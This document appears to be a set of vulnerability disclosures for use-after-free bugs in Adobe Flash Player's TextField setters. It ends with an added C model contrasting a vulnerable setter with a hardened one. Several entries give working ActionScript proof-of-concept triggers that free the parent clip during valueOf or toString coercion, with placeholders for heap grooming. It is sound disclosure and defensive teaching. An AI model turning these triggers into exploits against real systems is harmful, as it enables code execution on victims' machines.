There is a use-after-free in the TextField.tabIndex setter. If the integer parameter is an object with valueOf defined, the valueOf function can free the TextField's parent, leading to a use-after-free. A minimal PoC follows:

    var times = 0;
    var mc = this.createEmptyMovieClip('mc', 1);
    var tf = mc.createTextField('tf', 2, 1, 1, 100, 100);
    tf.text = 'hello';
    tf.tabIndex = {valueOf : func};

    function func(){
        if(times == 0){
            times++;
            return;
        }
        mc.removeMovieClip();
        // Fix heap here
        return 0x77777777;
    }
There is a use-after-free in the TextField.text setter. If the text the field is set to is an object with toString defined, the toString function can free the field's parent object, which is then used. A minimal PoC is as follows:

    var mc = this.createEmptyMovieClip('mc', 101);
    var tf = mc.createTextField('tf', 102, 1, 1, 100, 100);
    tf.text = {toString : func};

    function func(){
        mc.removeMovieClip();
        // Fix heap here
        return 'natalie';
    }

A sample swf and fla are attached.
There is a use-after-free in the TextField.type setter. If the type the field is set to is an object with toString defined, the toString function can free the field's parent object, which is then used. A minimal PoC is as follows:

    var mc = this.createEmptyMovieClip('mc', 101);
    var tf = mc.createTextField('tf', 102, 1, 1, 100, 100);
    tf.type = {toString : func};

    function func(){
        mc.removeMovieClip();
        // Fix heap here
        return 'input';
    }

A sample swf and fla are attached.
There is a use-after-free in the TextField.htmlText setter. If the htmlText the field is set to is an object with toString defined, the toString function can free the field's parent object, which is then used. A minimal PoC is as follows:

    var mc = this.createEmptyMovieClip('mc', 101);
    var tf = mc.createTextField('tf', 102, 1, 1, 100, 100);
    tf.htmlText = {toString : func};

    function func(){
        mc.removeMovieClip();
        // Fix heap here
        return '<b>hello</b>';
    }
There is a use-after-free in the TextField.variable setter. If the variable name that is assigned is an object with toString defined, the toString function can free the field's parent object, which is then used. A minimal PoC is as follows:

    var mc = this.createEmptyMovieClip('mc', 101);
    var tf = mc.createTextField('tf', 102, 1, 1, 100, 100);
    tf.variable = {toString : func};

    function func(){
        mc.removeMovieClip();
        // Fix heap here
        return 'myvar';
    }
There is a use-after-free vulnerability in the TextField.replaceText function of Adobe Flash Player. If the function is called with a string parameter that is an object with toString defined, or an integer parameter that is an object with valueOf defined, the parent object of the TextField can be used after it is freed. This can be exploited to execute arbitrary code. Proof of Concept code is provided in the description.
There is a use-after-free in TextField.replaceSel. If the string parameter of the method is an object with toString defined, the toString function can delete the TextField's parent, leading to a use-after-free. A minimal PoC is provided in the text.
There is a use-after-free vulnerability in the TextField thickness setter. If the thickness parameter is an object whose valueOf function frees the TextField's parent, the parent is used after it is freed. A proof-of-concept exploit is provided which creates a TextField and sets the thickness parameter to an object with a valueOf function which frees the TextField parent.
There is a use-after-free in the TextField sharpness setter. If the sharpness parameter is an object with valueOf set to a function which frees the TextField parent, it is used after it is freed. A minimal PoC is as follows:

    var times = 0;
    var mc = this.createEmptyMovieClip('mc', 101);
    var tf = mc.createTextField('tf', 102, 1, 1, 100, 100);
    tf.sharpness = {valueOf : func};

    function func(){
        if(times == 0){
            times++;
            return 0;
        }
        mc.removeMovieClip();
        // Fix heap here
        return 0;
    }
There is a use-after-free in Selection.SetSelection. If it is called with a number parameter that is an object with valueOf defined, and that function frees the parent of the TextField parameter, the parent object is used after it is freed.
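Every entry above is one pattern: a native setter or method coerces a script-controlled argument through valueOf or toString, script runs re-entrantly during that coercion, and the script can release the parent object the native code is about to use. The following is an added example, not code from the page or from Adobe: a constructed C model of that pattern showing the vulnerable setter shape next to a hardened one that pins the parent with a strong reference for the duration of the callback. All names in it (Object, set_value_vulnerable, set_value_hardened, scenario, the static pool) are hypothetical, and objects are never really free()d so that a stale use is detectable by a flag rather than being undefined behaviour.

```c
/* Constructed model of a script-coercion re-entrancy bug and its fix.
 * Objects live in a static pool and are never free()d; "freed" is a flag. */
#include <stdio.h>
#include <string.h>

#define POOL_SIZE 4

typedef struct Object {
    int refcount;          /* strong references held by script and native code */
    int freed;             /* set when refcount reaches zero (stands in for free()) */
    char name[16];
    struct Object *parent; /* non-owning back-pointer from a child to its parent */
} Object;

static Object pool[POOL_SIZE];
static int next_slot;

static void pool_reset(void) { memset(pool, 0, sizeof pool); next_slot = 0; }

static Object *obj_new(const char *name, Object *parent) {
    Object *o = &pool[next_slot++];
    o->refcount = 1;
    o->parent = parent;
    strncpy(o->name, name, sizeof o->name - 1);
    return o;
}
static void obj_retain(Object *o)  { o->refcount++; }
static void obj_release(Object *o) { if (--o->refcount == 0) o->freed = 1; }

/* Script-side coercion callback (the valueOf analogue): gets script state,
 * returns the coerced integer. */
typedef int (*value_of_fn)(void *ctx);
typedef struct { Object *parent_ref; } ScriptCtx;

/* Benign valueOf: just produces a number. */
static int benign_value_of(void *ctx) { (void)ctx; return 5; }

/* Hostile valueOf: drops the script's reference to the parent, the analogue
 * of calling mc.removeMovieClip() from inside valueOf in the entries above. */
static int hostile_value_of(void *ctx) {
    ScriptCtx *c = ctx;
    if (c->parent_ref) { obj_release(c->parent_ref); c->parent_ref = NULL; }
    return 5;
}

/* Vulnerable shape: resolve the parent pointer, run script, then use the
 * pointer. Returns 0 on success, -1 where a real engine would be touching
 * freed memory. */
static int set_value_vulnerable(Object *field, value_of_fn coerce, void *ctx, int *out) {
    Object *parent = field->parent;
    int v = coerce(ctx);            /* script runs here and may free parent */
    if (parent->freed) return -1;   /* use-after-free in the real engine */
    *out = v;
    return 0;
}

/* Hardened shape: hold a strong reference to the parent across the callback
 * so script cannot free it underneath us; release only after the last use. */
static int set_value_hardened(Object *field, value_of_fn coerce, void *ctx, int *out) {
    Object *parent = field->parent;
    obj_retain(parent);
    int v = coerce(ctx);
    int rc = parent->freed ? -1 : 0; /* cannot trigger: we hold a reference */
    if (rc == 0) *out = v;
    obj_release(parent);             /* may free it now, after the setter is done */
    return rc;
}

/* Replays the page's scenario (script holds mc, tf is a child of mc, the
 * setter is invoked with a coercing argument) against one of the setters.
 * Returns the setter's status; the coerced value lands in *out. */
static int scenario(int hardened, value_of_fn cb, int *out) {
    pool_reset();
    Object *mc = obj_new("mc", NULL);   /* the script's reference to the parent */
    Object *tf = obj_new("tf", mc);     /* child field with a parent link to mc */
    ScriptCtx ctx = { mc };
    *out = 0;
    return hardened ? set_value_hardened(tf, cb, &ctx, out)
                    : set_value_vulnerable(tf, cb, &ctx, out);
}

int main(void) {
    int v, rc;
    rc = scenario(0, hostile_value_of, &v);
    printf("vulnerable setter, hostile valueOf: rc=%d\n", rc);      /* -1: stale parent used */
    rc = scenario(1, hostile_value_of, &v);
    printf("hardened setter,   hostile valueOf: rc=%d v=%d\n", rc, v); /* 0, 5 */
    rc = scenario(0, benign_value_of, &v);
    printf("vulnerable setter, benign valueOf:  rc=%d v=%d\n", rc, v); /* 0, 5 */
    return 0;
}
```

Pinning the parent is one of two standard fixes; the other is to coerce every script argument before resolving any native pointers and to re-validate the object graph afterwards. Either way, the rule a reviewer applies to each entry above is the same: no native pointer obtained before a callback into script may be used after it without a reference held across the call.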